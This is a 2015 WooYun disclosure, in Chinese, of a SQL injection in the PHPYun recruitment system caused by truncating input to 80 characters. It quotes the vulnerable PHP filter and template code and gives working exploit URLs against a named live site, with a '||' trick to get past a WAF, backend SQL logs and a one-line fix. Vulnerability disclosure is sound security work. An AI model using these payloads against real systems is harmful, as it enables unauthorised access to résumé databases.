当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089538

漏洞标题:PHP云人才系统某处设计缺陷导致的SQL注入

相关厂商:php云人才系统

漏洞作者: 龟兔赛跑

提交时间:2015-01-06 10:48

修复时间:2015-04-02 10:23

公开时间:2015-04-02 10:23

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-06: 细节已通知厂商并且等待厂商处理中
2015-01-11: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-03-07: 细节向核心白帽子及相关领域专家公开
2015-03-17: 细节向普通白帽子公开
2015-03-27: 细节向实习白帽子公开
2015-04-02: 细节向公众公开

简要描述:

PHP云人才系统某处设计缺陷导致的SQL注入
(最新版DEMO测试,同样适用低版本)

详细说明:

在文件/data/db.safety.php:193

193  foreach($_GET  as $id=>$v){
 194      
 195      $str = html_entity_decode($v,ENT_QUOTES,"GB2312");
 196      
 197      $v = common_htmlspecialchars($id,$v,$str,$config);
 198      safesql($id,$v,"GET",$config);
 199      $id = sfkeyword($id,$config);
 200      $v = sfkeyword($v,$config);
 201      if(!is_array($v))
 202      $v=substr(strip_tags($v),0,80);
 203      $_GET[$id]=$v;
 204  }
 205  
 206  foreach($_COOKIE  as $id=>$v){
 207      
 208      $str = html_entity_decode($v,ENT_QUOTES,"GB2312");
 209      
 210      $v = common_htmlspecialchars($id,$v,$str,$config);
 211      safesql($id,$v,"COOKIE",$config);
 212      $id = sfkeyword($id,$config);
 213      $v = sfkeyword($v,$config);
 214      $v=substr(strip_tags($v),0,52);
 215      $_COOKIE[$id]=$v;
 216  }


第202行直接substr(strip_tags($v),0,80),然后赋值给$_GET[$id],这里存在被截断,导致注入\, 如果GET后面的参数可控,即可SQL注入。
下面我们以WAP版的一个例子来说明,URL为:

http://www.hr135.com/wap/index.php?m=user&keyword=&provinceid=&cityid=&three_cityid=&job1=&job1_son=&job_post=&job_classid=&hy=&exp=&edu=&report=&salary=&sex=&type=&uptime=


这里各个参数基本都是使用'引号了.
include/libs/Smarty_Compiler.class.php

1713  	 function _complie_userlist_start($tag_args)
1714       {
1715          $paramer = $this->_parse_attrs($tag_args);
1716          $item = str_replace("'","",$paramer[item]);
1717          global $db,$db_config,$config;
1718          
1719          $ParamerArr = $this->GetSmarty($paramer,$_GET);
...snip...
1887          
1888          if($paramer['exp']){
1889              $where .=" AND a.exp='".$paramer['exp']."'";
1890          }else{
1891              $where .=" AND a.exp>'0'";
1892          }
1893          
1894          if($paramer['edu']){
1895              $where .=" AND a.edu='".$paramer['edu']."'";
1896          }else{
1897              $where .=" AND a.edu>'0'";
1898          }
1899          
1900          if($paramer['sex'])
1901          {
1902              $where .=" AND a.sex='".$paramer['sex']."'";
1903          }
1904          
...snip...
1970          $user=$db->select_alls("resume","resume_expect",$where.$limit,"b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid");


edu和sex是连续使用GET参数,前后都可控,所以我们构造一下这两个参数,edu正好是80位,sex随意:

http://www.hr135.com/wap/index.php?m=user&keyword=&provinceid=&cityid=&three_cityid=&job1=&job1_son=&job_post=&job_classid=&hy=&exp=&edu=01234567890123456789012345678901234567890123456789012345678901234567890123456789&report=&salary=&sex=1&type=&uptime=


后台执行的SQL为:

2014-12-31 17:12:41	SELECT count(b.id) as count FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND  a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='01234567890123456789012345678901234567890123456789012345678901234567890123456789' AND a.sex='1' ORDER BY b.lastupdate  DESC
2014-12-31 17:12:41	SELECT b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND  a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='01234567890123456789012345678901234567890123456789012345678901234567890123456789' AND a.sex='1' ORDER BY b.lastupdate  DESC limit 0,20


我们把edu的最后以为替换为\,由于substr,最后面的\\变成了\,则执行的SQL语句为:

2014-12-31 17:13:58	SELECT count(b.id) as count FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND  a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='1' ORDER BY b.lastupdate  DESC
2014-12-31 17:13:58	SELECT b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND  a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='1' ORDER BY b.lastupdate  DESC limit 0,20

3.png


接下来构造一下sex参数,由于/*!or*/会被安全狗拦截,使用||代替。sex为||1 limit 1#

http://www.hr135.com/wap/index.php?m=user&keyword=&provinceid=&cityid=&three_cityid=&job1=&job1_son=&job_post=&job_classid=&hy=&exp=&edu=0123456789012345678901234567890123456789012345678901234567890123456789012345678\&report=&salary=&sex=||1%20limit%201%23&type=&uptime=

显示1行数据(limit 1),后台执行的SQL为:

2014-12-31 17:19:02	SELECT count(b.id) as count FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND  a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='||1 limit 1#' ORDER BY b.lastupdate  DESC
2014-12-31 17:19:02	SELECT b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND  a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='||1 limit 1#' ORDER BY b.lastupdate  DESC limit 0,20

4.png


1.png


http://www.hr135.com/wap/index.php?m=user&keyword=&provinceid=&cityid=&three_cityid=&job1=&job1_son=&job_post=&job_classid=&hy=&exp=&edu=0123456789012345678901234567890123456789012345678901234567890123456789012345678\&report=&salary=&sex=||1%20limit%203%23&type=&uptime=

显示3行数据(limit 3),后台执行的SQL为:

2014-12-31 17:20:02	SELECT count(b.id) as count FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND  a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='||1 limit 3#' ORDER BY b.lastupdate  DESC
2014-12-31 17:20:02	SELECT b.*,a.*,a.name as username,b.provinceid as provinceid,b.cityid as cityid FROM phpyun_resume as a,phpyun_resume_expect as b WHERE a.status<>'2' and a.`r_status`<>'2' and b.`job_classid`<>'' and b.`open`='1' and a.`uid`=b.`uid` AND  a.`def_job`=b.`id` AND b.hy<>'' AND a.exp>'0' AND a.edu='0123456789012345678901234567890123456789012345678901234567890123456789012345678\' AND a.sex='||1 limit 3#' ORDER BY b.lastupdate  DESC limit 0,20

5.png

2.png

漏洞证明:

1.png


2.png

修复方案:

substr()以后最后以为字符不能为'\'
(乌云一个\总会变成两个?)

版权声明:转载请注明来源 龟兔赛跑@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-02 10:23

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-06 12:43 | 小菜虫 ( 路人 | Rank:24 漏洞数:5 )

    前排膜拜大神,不知道怎么绕过系统过滤的